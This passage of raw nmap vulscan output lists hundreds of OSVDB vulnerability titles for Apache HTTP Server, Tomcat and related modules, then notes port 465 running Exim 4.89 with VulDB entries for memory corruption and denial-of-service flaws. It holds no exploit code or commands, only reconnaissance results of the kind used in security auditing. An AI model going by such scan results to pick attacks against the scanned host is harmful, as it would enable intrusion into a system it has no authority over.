16553| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
16554| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
16555| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
16556| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
16557| [55056] Apache Tomcat Cross-application TLD File Manipulation
16558| [55055] Apache Tomcat Illegal URL Encoded Password Request Username Enumeration
16559| [55054] Apache Tomcat Java AJP Connector mod_jk Load Balancing Worker Malformed Header Remote DoS
16560| [55053] Apache Tomcat Crafted Request Security Restraint Bypass Arbitrary Content Access
16561| [54733] Apache HTTP Server AllowOverride Directive .htaccess Options Bypass
16562| [54713] razorCMS Security Manager apache User Account Unspecified File Permission Weakness Issue
16563| [54589] Apache Jserv Nonexistent JSP Request XSS
16564| [54122] Apache Struts s:a / s:url Tag href Element XSS
16565| [54093] Apache ActiveMQ Web Console JMS Message XSS
16566| [53932] Apache Geronimo Multiple Admin Function CSRF
16567| [53931] Apache Geronimo /console/portal/Server/Monitoring Multiple Parameter XSS
16568| [53930] Apache Geronimo /console/portal/ URI XSS
16569| [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload
16570| [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload
16571| [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload
16572| [53921] Apache HTTP Server mod_proxy_ajp Cross Thread/Session Information Disclosure
16573| [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
16574| [53574] PHP on Apache .htaccess mbstring.func_overload Setting Cross Hosted Site Behavior Modification
16575| [53381] Apache Tomcat JK Connector Content-Length Header Cross-user Information Disclosure
16576| [53380] Apache Struts Unspecified XSS
16577| [53289] Apache mod_perl Apache::Status /perl-status Unspecified XSS
16578| [53186] Apache HTTP Server htpasswd Predictable Salt Weakness
16579| [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
16580| [52407] Apache Tomcat doRead Method POST Content Information Disclosure
16581| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
16582| [51613] Apache HTTP Server Third-party Module Child Process File Descriptor Leak
16583| [51612] Apache HTTP Server Internal Redirect Handling Infinite Loop DoS
16584| [51468] Apache Jackrabbit Content Repository (JCR) swr.jsp q Parameter XSS
16585| [51467] Apache Jackrabbit Content Repository (JCR) search.jsp q Parameter XSS
16586| [51151] Apache Roller Search Function q Parameter XSS
16587| [50482] PHP with Apache php_value Order Unspecified Issue
16588| [50475] Novell NetWare ApacheAdmin Console Unauthenticated Access
16589| [49734] Apache Struts DefaultStaticContentLoader Class Traversal Arbitrary File Access
16590| [49733] Apache Struts FilterDispatcher Class Traversal Arbitrary File Access
16591| [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
16592| [49062] Apache Tomcat Cross-thread Concurrent Request Variable Overwrite Information Disclosure
16593| [48847] ModSecurity (mod_security) Transformation Caching Unspecified Apache DoS
16594| [48788] Apache Xerces-C++ XML Schema maxOccurs Value XML File Handling DoS
16595| [47474] Apache HTTP Server mod_proxy_ftp Directory Component Wildcard Character XSS
16596| [47464] Apache Tomcat allowLinking / UTF-8 Traversal Arbitrary File Access
16597| [47463] Apache Tomcat RequestDispatcher Traversal Arbitrary File Access
16598| [47462] Apache Tomcat HttpServletResponse.sendError Method Message Argument XSS
16599| [47096] Oracle Weblogic Apache Connector POST Request Overflow
16600| [46382] Frontend Filemanager (air_filemanager) Extension for TYPO3 on Apache Unspecified Arbitrary Code Execution
16601| [46285] TYPO3 on Apache Crafted Filename Upload Arbitrary Command Execution
16602| [46085] Apache HTTP Server mod_proxy ap_proxy_http_process_response() Function Interim Response Forwarding Remote DoS
16603| [45905] Apache Tomcat Host Manager host-manager/html/add name Parameter XSS
16604| [45879] Ragnarok Online Control Panel on Apache Crafted Traversal Authentication Bypass
16605| [45742] Apache HTTP Server on Novell Unspecified Request Directive Internal IP Disclosure
16606| [45740] Apache Derby DropSchemaNode Bind Phase Arbitrary Scheme Statement Dropping
16607| [45599] Apache Derby Lock Table Statement Privilege Requirement Bypass Arbitrary Table Lock
16608| [45585] Apache Derby ACCSEC Command RDBNAM Parameter Cleartext Credential Disclosure
16609| [45584] Apache Derby DatabaseMetaData.getURL Function Cleartext Credential Disclosure
16610| [45420] Apache HTTP Server 403 Error Page UTF-7 Encoded XSS
16611| [44728] PHP Toolkit on Gentoo Linux Interpretation Conflict Apache HTTP Server Local DoS
16612| [44618] Oracle JSP Apache/Jserv Path Translation Traversal Arbitrary JSP File Execution
16613| [44159] Apache HTTP Server Remote Virtual Host Name Disclosure
16614| [43997] Apache-SSL ExpandCert() Function Certificate Handling Arbitrary Environment Variables Manipulation
16615| [43994] suPHP for Apache (mod_suphp) Directory Symlink Local Privilege Escalation
16616| [43993] suPHP for Apache (mod_suphp) Owner Mode Race Condition Symlink Local Privilege Escalation
16617| [43663] Apache HTTP Server Mixed Platform AddType Directive Crafted Request PHP Source Disclosure
16618| [43658] AuthCAS Module (AuthCAS.pm) for Apache HTTP Server SESSION_COOKIE_NAME SQL Injection
16619| [43452] Apache Tomcat HTTP Request Smuggling
16620| [43309] Apache Geronimo LoginModule Login Method Bypass
16621| [43290] Apache JSPWiki Entry Page Attachment Unrestricted File Upload
16622| [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption
16623| [43224] Apache Geronimo on SuSE Linux init Script Symlink Unspecified File/Directory Access
16624| [43189] Apache mod_jk2 Host Header Multiple Fields Remote Overflow
16625| [42937] Apache HTTP Server mod_proxy_balancer balancer-manager Unspecified CSRF
16626| [42341] MOD_PLSQL for Apache Unspecified URL SQL Injection
16627| [42340] MOD_PLSQL for Apache CGI Environment Handling Unspecified Overflow
16628| [42214] Apache HTTP Server mod_proxy_ftp UTF-7 Encoded XSS
16629| [42091] Apache Maven Site Plugin Installation Permission Weakness
16630| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
16631| [42088] Apache Maven Defined Repo Process Listing Password Disclosure
16632| [42087] Apache Maven Site Plugin SSH Deployment Permission Setting Weakness
16633| [42036] Apache HTTP Server MS-DOS Device Request Host OS Disclosure
16634| [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
16635| [41436] Apache Tomcat Native APR Connector Duplicate Request Issue
16636| [41435] Apache Tomcat %5C Cookie Handling Session ID Disclosure
16637| [41434] Apache Tomcat Exception Handling Subsequent Request Information Disclosure
16638| [41400] LimeSurvey save.php Apache Log File PHP Code Injection
16639| [41029] Apache Tomcat Calendar Examples Application cal2.jsp Multiple Parameter CSRF
16640| [41019] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload XSS
16641| [41018] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload CRLF
16642| [40853] Apache Tomcat SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) JSESSIONIDSSO Cookie Security Weakness
16643| [40264] Apache HTTP Server mod_proxy_balancer balancer_handler Function bb Variable Remote DoS
16644| [40263] Apache HTTP Server mod_proxy_balancer balancer-manager Multiple Parameter XSS
16645| [40262] Apache HTTP Server mod_status refresh XSS
16646| [39833] Apache Tomcat JULI Logging Component catalina.policy Security Bypass
16647| [39251] Coppermine Photo Gallery on Apache Multiple File Extension Upload Arbitrary Code Execution
16648| [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure
16649| [39134] Apache mod_imagemap Module Imagemap Unspecified XSS
16650| [39133] Apache mod_imap Module Imagemap File Unspecified XSS
16651| [39035] Apache Tomcat examples/servlet/CookieExample Multiple Parameter XSS
16652| [39003] Apache HTTP Server HTTP Method Header Request Entity Too Large XSS
16653| [39000] Apache Tomcat SendMailServlet sendmail.jsp mailfrom Parameter XSS
16654| [38939] Apache HTTP Server Prefork MPM Module Array Modification Local DoS
16655| [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
16656| [38662] Apache Geronimo SQLLoginModule Nonexistent User Authentication Bypass
16657| [38661] Apache Geronimo MEJB Unspecified Authentication Bypass
16658| [38641] Apache HTTP Server mod_mem_cache recall_headers Function Information Disclosure
16659| [38640] Apache HTTP Server suexec Document Root Unauthorized Operations
16660| [38639] Apache HTTP Server suexec Multiple Symlink Privilege Escalation
16661| [38636] Apache HTTP Server mod_autoindex.c P Variable UTF-7 Charset XSS
16662| [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
16663| [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
16664| [37079] Apache HTTP Server mod_cache cache_util.c Malformed Cache-Control Header DoS
16665| [37071] Apache Tomcat Cookie Handling Session ID Disclosure
16666| [37070] Apache Tomcat Cookie Handling Quote Delimiter Session ID Disclosure
16667| [37052] Apache HTTP Server mod_status mod_status.c Unspecified XSS
16668| [37051] Apache HTTP Server mod_proxy modules/proxy/proxy_util.c Crafted Header Remote DoS
16669| [37050] Apache HTTP Server Prefork MPM Module Crafted Code Sequence Local DoS
16670| [36417] Apache Tomcat Host Manager Servlet html/add Action aliases Parameter XSS
16671| [36377] Apache MyFaces Tomahawk JSF Application autoscroll Multiple Script XSS
16672| [36080] Apache Tomcat JSP Examples Crafted URI XSS
16673| [36079] Apache Tomcat Manager Uploaded Filename XSS
16674| [34888] Apache Tomcat Example Calendar Application cal2.jsp time Parameter XSS
16675| [34887] Apache Tomcat implicit-objects.jsp Crafted Header XSS
16676| [34885] Apache Tomcat on IIS Servlet Engine MS-DOS Device Request DoS
16677| [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure
16678| [34883] Apache Tomcat Crafted JSP File Request Path Disclosure
16679| [34882] Apache Tomcat Default SSL Ciphersuite Configuration Weakness
16680| [34881] Apache Tomcat Malformed Accept-Language Header XSS
16681| [34880] Apache Tomcat HTTP/1.1 Connector NULL Byte Request JSP Source Disclosure
16682| [34879] Apache Tomcat examples/jsp2/jspx/textRotate.jspx XSS
16683| [34878] Apache Tomcat examples/jsp2/el/implicit-objects.jsp XSS
16684| [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
16685| [34876] Apache HTTP Server ScriptAlias CGI Source Disclosure
16686| [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
16687| [34874] Apache Tomcat AJP Connector mod_jk ajp_process_callback Remote Memory Disclosure
16688| [34873] Apache Stats Variable Extraction _REQUEST Ssuperglobal Array Overwrite
16689| [34872] Apache HTTP Server suexec User/Group Combination Weakness Local Privilege Escalation
16690| [34769] Apache Tomcat w/ Proxy Module Double Encoded Traversal Arbitrary File Access
16691| [34541] mod_perl for Apache HTTP Server RegistryCooker.pm PATH_INFO Crafted URI Remote DoS
16692| [34540] mod_perl for Apache HTTP Server PerlRun.pm PATH_INFO Crafted URI Remote DoS
16693| [34398] Apache Tomcat mod_jk Invalid Chunked Encoded Body Information Disclosure
16694| [34154] Apache Axis Nonexistent Java Web Service Path Disclosure
16695| [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
16696| [33816] Apache HTTP Server on Debian Linux TTY Local Privilege Escalation
16697| [33456] Apache HTTP Server Crafted TCP Connection Range Header DoS
16698| [33346] Avaya Multiple Products Apache Tomcat Port Weakness
16699| [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
16700| [32978] Apache Java Mail Enterprise Server (JAMES) POP3Server Log File Plaintext Password Disclosure
16701| [32724] Apache mod_python _filter_read Freed Memory Disclosure
16702| [32723] Apache Tomcat semicolon Crafted Filename Request Forced Directory Listing
16703| [32396] Apache Open For Business Project (OFBiz) Ecommerce Component Forum Implementation Message Body XSS
16704| [32395] Apache Open For Business Project (OFBiz) Ecommerce Component Form Field Manipulation Privilege Escalation
16705| [30354] Linux Subversion libapache2-svn Search Path Subversion Local Privilege Escalation
16706| [29603] PHP ini_restore() Apache httpd.conf Options Bypass
16707| [29536] Apache Tcl mod_tcl set_var Function Remote Format String
16708| [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
16709| [28130] PHP with Apache Mixed Case Method Limit Directive Bypass
16710| [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure
16711| [27588] Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
16712| [27487] Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection
16713| [26935] FCKeditor on Apache connector.php Crafted File Extension Arbitrary File Upload
16714| [26572] Apache Java Mail Enterprise Server (JAMES) MAIL Command Overflow DoS
16715| [25909] Drupal on Apache files Directory File Upload Arbitrary Code Execution
16716| [24825] Oracle ModPL/SQL for Apache Unspecified Remote HTTP Issue
16717| [24365] Apache Struts Multiple Function Error Message XSS
16718| [24364] Apache Struts getMultipartRequestHandler() Function Crafted Request DoS
16719| [24363] Apache Struts org.apache.struts.taglib.html.Constants.CANCEL Validation Bypass
16720| [24103] Pubcookie Apache mod_pubcookie Unspecified XSS
16721| [23906] Apache mod_python for Apache HTTP Server FileSession Privileged Local Command Execution
16722| [23905] Apache Log4net LocalSyslogAppender Format String Memory Corruption DoS
16723| [23198] Apache WSS4J Library SOAP Signature Verification Bypass
16724| [23124] Generic Apache Request Library (libapreq) apreq_parse_* Functions Remote DoS
16725| [22652] mod_php for Apache HTTP Server Crafted import_request_variables Function DoS
16726| [22475] PHP w/ Apache PDO::FETCH_CLASS __set() Function DoS
16727| [22473] PHP w/ Apache2 Crafted PDOStatement DoS
16728| [22459] Apache Geronimo Error Page XSS
16729| [22458] Apache Tomcat / Geronimo Sample Script cal2.jsp time Parameter XSS
16730| [22301] auth_ldap for Apache HTTP Server auth_ldap_log_reason() Function Remote Format String
16731| [22261] Apache HTTP Server mod_ssl ssl_hook_Access Error Handling DoS
16732| [22259] mod_auth_pgsql for Apache HTTP Server Log Function Format String
16733| [21736] Apache Java Mail Enterprise Server (JAMES) Spooler retrieve Function DoS
16734| [21705] Apache HTTP Server mod_imap Image Map Referer XSS
16735| [21021] Apache Struts Error Message XSS
16736| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
16737| [20491] PHP mod_php apache2handler SAPI Crafted .htaccess DoS
16738| [20462] Apache HTTP Server worker.c MPM Memory Exhaustion DoS
16739| [20439] Apache Tomcat Directory Listing Saturation DoS
16740| [20373] Apache Tomcat on HP Secure OS for Linux Unspecified Servlet Access Issue
16741| [20285] Apache HTTP Server Log File Control Character Injection
16742| [20242] Apache HTTP Server mod_usertrack Predictable Session ID Generation
16743| [20209] Brainf*ck Module (mod_bf) for Apache HTTP Server Local Overflow
16744| [20033] Apache Tomcat MS-DOS Device Request Error Message Path Disclosure
16745| [19883] apachetop atop.debug Symlink Arbitrary File Overwrite
16746| [19863] mod_auth_shadow for Apache HTTP Server require group Authentication Bypass
16747| [19855] Apache HTTP Server ErrorDocument Directive .htaccess Bypass
16748| [19821] Apache Tomcat Malformed Post Request Information Disclosure
16749| [19769] Apache HTTP Server Double-reverse DNS Lookup Spoofing
16750| [19188] Apache HTTP Server mod_ssl SSLVerifyClient Per-location Context Restriction Bypass
16751| [19137] Apache HTTP Server on Red Hat Linux Double Slash GET Request Forced Directory Listing
16752| [19136] Apache on Mandrake Linux Arbitrary Directory Forced Listing
16753| [18977] Apache HTTP Server Crafted HTTP Range Header DoS
16754| [18389] Ragnarok Online Control Panel Apache Authentication Bypass
16755| [18286] Apache HTTP Server mod_ssl ssl_callback_SSLVerify_CRL( ) Function Overflow
16756| [18233] Apache HTTP Server htdigest user Variable Overfow
16757| [17738] Apache HTTP Server HTTP Request Smuggling
16758| [16586] Apache HTTP Server Win32 GET Overflow DoS
16759| [15889] Apache HTTP Server mod_cgid Threaded MPM CGI Output Misdirection
16760| [14896] mod_dav for Apache HTTP Server Remote Null Dereference Child Process Termination
16761| [14879] Apache HTTP Server ap_log_rerror Function Error Message Path Disclosure
16762| [14770] Apache Tomcat AJP12 Protocol Malformed Packet Remote DoS
16763| [14597] Apache Tomcat IntegerOverflow.jsp Test JSP Script Path Disclosure
16764| [14596] Apache Tomcat pageSession.jsp Test JSP Script Path Disclosure
16765| [14595] Apache Tomcat pageLanguage.jsp Test JSP Script Path Disclosure
16766| [14594] Apache Tomcat pageIsThreadSafe.jsp Test JSP Script Path Disclosure
16767| [14593] Apache Tomcat pageIsErrorPage.jsp Test JSP Script Path Disclosure
16768| [14592] Apache Tomcat pageInvalid.jsp Test JSP Script Path Disclosure
16769| [14591] Apache Tomcat pageExtends.jsp Test JSP Script Path Disclosure
16770| [14590] Apache Tomcat pageDouble.jsp Test JSP Script Path Disclosure
16771| [14589] Apache Tomcat pageAutoFlush.jsp Test JSP Script Path Disclosure
16772| [14588] Apache Tomcat extends2.jsp Test JSP Script Path Disclosure
16773| [14587] Apache Tomcat extends1.jsp Test JSP Script Path Disclosure
16774| [14586] Apache Tomcat comments.jsp Test JSP Script Path Disclosure
16775| [14585] Apache Tomcat buffer4.jsp Test JSP Script Path Disclosure
16776| [14584] Apache Tomcat buffer3.jsp Test JSP Script Path Disclosure
16777| [14583] Apache Tomcat buffer2.jsp Test JSP Script Path Disclosure
16778| [14582] Apache Tomcat buffer1.jsp Test JSP Script Path Disclosure
16779| [14581] Apache Tomcat pageImport2.jsp Test JSP Script Path Disclosure
16780| [14580] Apache Tomcat pageInfo.jsp Test JSP Script Path Disclosure
16781| [14410] mod_frontpage for Apache HTTP Server fpexec Remote Overflow
16782| [14044] Apache Batik Squiggle Browser with Rhino Scripting Engine Unspecified File System Access
16783| [13737] mod_access_referer for Apache HTTP Server Malformed Referer DoS
16784| [13711] Apache mod_python publisher.py Traversal Arbitrary Object Information Disclosure
16785| [13640] mod_auth_any for Apache HTTP Server on Red Hat Linux Metacharacter Command Execution
16786| [13304] Apache Tomcat realPath.jsp Path Disclosure
16787| [13303] Apache Tomcat source.jsp Arbitrary Directory Listing
16788| [13087] Apache HTTP Server mod_log_forensic check_forensic Symlink Arbitrary File Creation / Overwrite
16789| [12849] mod_auth_radius for Apache HTTP Server radcpy() Function Overflow DoS
16790| [12848] Apache HTTP Server htdigest realm Variable Overflow
16791| [12721] Apache Tomcat examples/jsp2/el/functions.jsp XSS
16792| [12720] mod_dosevasive for Apache HTTP Server Symlink Arbitrary File Create/Overwrite
16793| [12558] Apache HTTP Server IPv6 FTP Proxy Socket Failure DoS
16794| [12557] Apache HTTP Server prefork MPM accept Error DoS
16795| [12233] Apache Tomcat MS-DOS Device Name Request DoS
16796| [12232] Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
16797| [12231] Apache Tomcat web.xml Arbitrary File Access
16798| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
16799| [12192] Apache HTTP Server on Mac OS X Unauthorized .ht and .DS_Store File Access
16800| [12178] Apache Jakarta Lucene results.jsp XSS
16801| [12176] mod_digest_apple for Apache HTTP Server on Mac OS X Authentication Replay
16802| [11391] Apache HTTP Server Header Parsing Space Saturation DoS
16803| [11003] Apache HTTP Server mod_include get_tag() Function Local Overflow
16804| [10976] mod_mylo for Apache HTTP Server mylo_log Logging Function HTTP GET Overflow
16805| [10637] Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
16806| [10546] Macromedia JRun4 mod_jrun Apache Module Remote Overflow
16807| [10471] Apache Xerces-C++ XML Parser DoS
16808| [10218] Apache HTTP Server Satisfy Directive Access Control Bypass
16809| [10068] Apache HTTP Server htpasswd Local Overflow
16810| [10049] mod_cplusplus For Apache HTTP Server Unspecified Overflow
16811| [9994] Apache HTTP Server apr-util IPV6 Parsing DoS
16812| [9991] Apache HTTP Server ap_resolve_env Environment Variable Local Overflow
16813| [9948] mod_dav for Apache HTTP Server LOCK Request DoS
16814| [9742] Apache HTTP Server mod_ssl char_buffer_read Function Reverse Proxy DoS
16815| [9718] Apache HTTP Server Win32 Single Dot Append Arbitrary File Access
16816| [9717] Apache HTTP Server mod_cookies Cookie Overflow
16817| [9716] Apache::Gallery Gallery.pm Inline::C Predictable Filename Code Execution
16818| [9715] Apache HTTP Server rotatelogs Control Characters Over Pipe DoS
16819| [9714] Apache Authentication Module Threaded MPM DoS
16820| [9713] Apache HTTP Server on OS2 filestat.c Device Name Request DoS
16821| [9712] Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
16822| [9711] Apache HTTP Server Access Log Terminal Escape Sequence Injection
16823| [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass
16824| [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution
16825| [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS
16826| [9707] Apache HTTP Server Duplicate MIME Header Saturation DoS
16827| [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
16828| [9705] Apache Tomcat Invoker/Default Servlet Source Disclosure
16829| [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
16830| [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing
16831| [9700] Apache HTTP Server mod_autoindex Multiple Slash Request Forced Directory Listing
16832| [9699] Apache HTTP Server mod_dir Multiple Slash Request Forced Directory Listing
16833| [9698] Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
16834| [9697] Apache HTTP Server htdigest Local Symlink Arbitrary File Overwrite
16835| [9696] Apache HTTP Server htpasswd Local Symlink Arbitrary File Overwrite
16836| [9695] Apache Tomcat SnoopServlet Servlet Information Disclosure
16837| [9694] PHP3 on Apache HTTP Server Encoded Traversal Arbitrary File Access
16838| [9693] mod_auth_pgsql_sys for Apache HTTP Server User Name SQL Injection
16839| [9692] Apache HTTP Server mod_vhost_alias Mass Virtual Hosting Arbitrary File Access
16840| [9691] Apache HTTP Server mod_rewrite Mass Virtual Hosting Arbitrary File Access
16841| [9690] Apache HTTP Server mod_vhost_alias CGI Program Source Disclosure
16842| [9689] Trustix httpsd for Apache-SSL Permission Weakness Privilege Escalation
16843| [9688] Apache HTTP Server mod_proxy Malformed FTP Command DoS
16844| [9687] Apache::AuthenSmb smbval SMB Authentication Library Multiple Overflows
16845| [9686] Apache::AuthenSmb smbvalid SMB Authentication Library Multiple Overflows
16846| [9523] Apache HTTP Server mod_ssl Aborted Connection DoS
16847| [9459] Oracle PL/SQL (mod_plsql) Apache Module Help Page Request Remote Overflow
16848| [9208] Apache Tomcat .jsp Encoded Newline XSS
16849| [9204] Apache Tomcat ROOT Application XSS
16850| [9203] Apache Tomcat examples Application XSS
16851| [9068] Apache HTTP Server mod_userdir User Account Information Disclosure
16852| [8773] Apache Tomcat Catalina org.apache.catalina.servlets.DefaultServlet Source Code Disclosure
16853| [8772] Apache Tomcat Catalina org.apache.catalina.connector.http DoS
16854| [7943] Apache HTTP Server mod_ssl sslkeys File Disclosure
16855| [7942] Apache HTTP Server mod_ssl Default Pass Phrase
16856| [7941] Apache HTTP Server mod_ssl Encrypted Private Key File Descriptor Leak
16857| [7935] Apache HTTP Server mod_ssl ssl_gcache Race Conditions
16858| [7934] Apache HTTP Server mod_ssl SSLSessionCache File Content Disclosure
16859| [7933] Apache HTTP Server mod_ssl SSLMutex File Content Disclosure
16860| [7932] Apache HTTP Server mod_ssl mkcert.sh File Creation Permission Weakness
16861| [7931] Apache HTTP Server mod_ssl X.509 Client Certificate Authentication Bypass
16862| [7930] Apache HTTP Server mod_ssl ssl_expr_eval_func_file() Overflow
16863| [7929] Apache HTTP Server mod_ssl ssl_engine_log.c mod_proxy Hook Function Remote Format String
16864| [7611] Apache HTTP Server mod_alias Local Overflow
16865| [7394] Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
16866| [7203] Apache Tomcat source.jsp Traversal Arbitrary File Access
16867| [7039] Apache HTTP Server on Mac OS X HFS+ File System Access Bypass
16868| [6882] Apache mod_python Malformed Query String Variant DoS
16869| [6839] Apache HTTP Server mod_proxy Content-Length Overflow
16870| [6630] Apache Tomcat Java Server Pages (JSP) Engine WPrinterJob() DoS
16871| [6472] Apache HTTP Server mod_ssl ssl_util_uuencode_binary Remote Overflow
16872| [5821] Apache HTTP Server Multiple / GET Remote Overflow DoS
16873| [5580] Apache Tomcat Servlet Malformed URL JSP Source Disclosure
16874| [5552] Apache HTTP Server split-logfile Arbitrary .log File Overwrite
16875| [5526] Apache Tomcat Long .JSP URI Path Disclosure
16876| [5278] Apache Tomcat web.xml Restriction Bypass
16877| [5051] Apache Tomcat Null Character DoS
16878| [4973] Apache Tomcat servlet Mapping XSS
16879| [4650] mod_gzip for Apache HTTP Server Debug Mode Printf Stack Overflow
16880| [4649] mod_gzip for Apache HTTP Server Debug Mode Format String Overflow
16881| [4648] mod_gzip for Apache HTTP Server Debug Mode Race Condition
16882| [4568] mod_survey For Apache ENV Tags SQL Injection
16883| [4553] Apache HTTP Server ApacheBench Overflow DoS
16884| [4552] Apache HTTP Server Shared Memory Scoreboard DoS
16885| [4446] Apache HTTP Server mod_disk_cache Stores Credentials
16886| [4383] Apache HTTP Server Socket Race Condition DoS
16887| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
16888| [4340] Apache Portable Runtime (APR) apr_psprintf DoS
16889| [4232] Apache Cocoon DatabaseAuthenticatorAction SQL Injection
16890| [4231] Apache Cocoon Error Page Server Path Disclosure
16891| [4182] Apache HTTP Server mod_ssl Plain HTTP Request DoS
16892| [4181] Apache HTTP Server mod_access IP Address Netmask Rule Bypass
16893| [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure
16894| [4037] Apache HTTP Server on Cygwin Encoded GET Request Arbitrary File Access
16895| [3877] Apache-SSL SSLVerifyClient SSLFakeBasicAuth Client Certificate Forgery
16896| [3819] Apache HTTP Server mod_digest Cross Realm Credential Replay
16897| [3322] mod_php for Apache HTTP Server Process Hijack
16898| [3215] mod_php for Apache HTTP Server File Descriptor Leakage
16899| [2885] Apache mod_python Malformed Query String DoS
16900| [2749] Apache Cocoon view-source Sample File Traversal Arbitrary File Access
16901| [2733] Apache HTTP Server mod_rewrite Local Overflow
16902| [2672] Apache HTTP Server mod_ssl SSLCipherSuite Ciphersuite Downgrade Weakness
16903| [2613] Apache HTTP Server mod_cgi stderr Output Handling Local DoS
16904| [2149] Apache::Gallery Privilege Escalation
16905| [2107] Apache HTTP Server mod_ssl Host: Header XSS
16906| [1926] Apache HTTP Server mod_rewrite Crafted URI Rule Bypass
16907| [1833] Apache HTTP Server Multiple Slash GET Request DoS
16908| [1577] Apache HTTP Server mod_rewrite RewriteRule Expansion Arbitrary File Access
16909| [872] Apache Tomcat Multiple Default Accounts
16910| [862] Apache HTTP Server SSI Error Page XSS
16911| [859] Apache HTTP Server Win32 Crafted Traversal Arbitrary File Access
16912| [849] Apache Tomcat TroubleShooter Servlet Information Disclosure
16913| [845] Apache Tomcat MSDOS Device XSS
16914| [844] Apache Tomcat Java Servlet Error Page XSS
16915| [842] Apache HTTP Server mod_ssl ssl_compat_directive Function Overflow
16916| [838] Apache HTTP Server Chunked Encoding Remote Overflow
16917| [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure
16918| [775] Apache mod_python Module Importing Privilege Function Execution
16919| [769] Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
16920| [756] Apache HTTP Server mod_ssl i2d_SSL_SESSION Function SSL Client Certificate Overflow
16921| [701] Apache HTTP Server Win32 ScriptAlias php.exe Arbitrary File Access
16922| [674] Apache Tomcat Nonexistent File Error Message Path Disclosure
16923| [637] Apache HTTP Server UserDir Directive Username Enumeration
16924| [623] mod_auth_pgsql for Apache HTTP Server User Name SQL Injection
16925| [582] Apache HTTP Server Multiviews Feature Arbitrary Directory Listing
16926| [562] Apache HTTP Server mod_info /server-info Information Disclosure
16927| [561] Apache Web Servers mod_status /server-status Information Disclosure
16928| [417] Apache HTTP Server on SuSE Linux /doc/packages Remote Information Disclosure
16929| [410] mod_perl for Apache HTTP Server /perl/ Directory Listing
16930| [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
16931| [402] Apache HTTP Server on SuSE Linux cgi-bin-sdb Request Script Source Disclosure
16932| [379] Apache ASP module Apache::ASP source.asp Example File Arbitrary File Creation
16933| [377] Apache Tomcat Snoop Servlet Remote Information Disclosure
16934| [376] Apache Tomcat contextAdmin Arbitrary File Access
16935| [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing
16936| [222] Apache HTTP Server test-cgi Arbitrary File Access
16937| [143] Apache HTTP Server printenv.pl Multiple Method CGI XSS
16938| [48] Apache HTTP Server on Debian /usr/doc Directory Information Disclosure
16939|_
16940465/tcp open ssl/smtp syn-ack Exim smtpd 4.89_1
16941| vulscan: VulDB - https://vuldb.com:
16942| [109969] Exim 4.88/4.89 SMTP Daemon receive.c bdat_getc denial of service
16943| [109968] Exim 4.88/4.89 SMTP Daemon receive.c receive_msg memory corruption
16944| [94599] Exim up to 4.87 information disclosure
16945| [13422] Exim 4.82 Mail Header dmarc.c expand_string() memory corruption
16946| [6817] Exim up to 4.80 src/dkim.c dkim_exim_query_dns_txt() memory corruption
16947| [113048] Exim up to 4.90 SMTP Listener Message memory corruption
16948| [58841] exim up to 4.69 dkim_exim_verify_finish memory corruption
16949| [57462] Exim up to 4.75 Filesystem memory corruption
16950| [4280] Exim Server 4.x open_log() race condition
16951|
16952| MITRE CVE - https://cve.mitre.org:
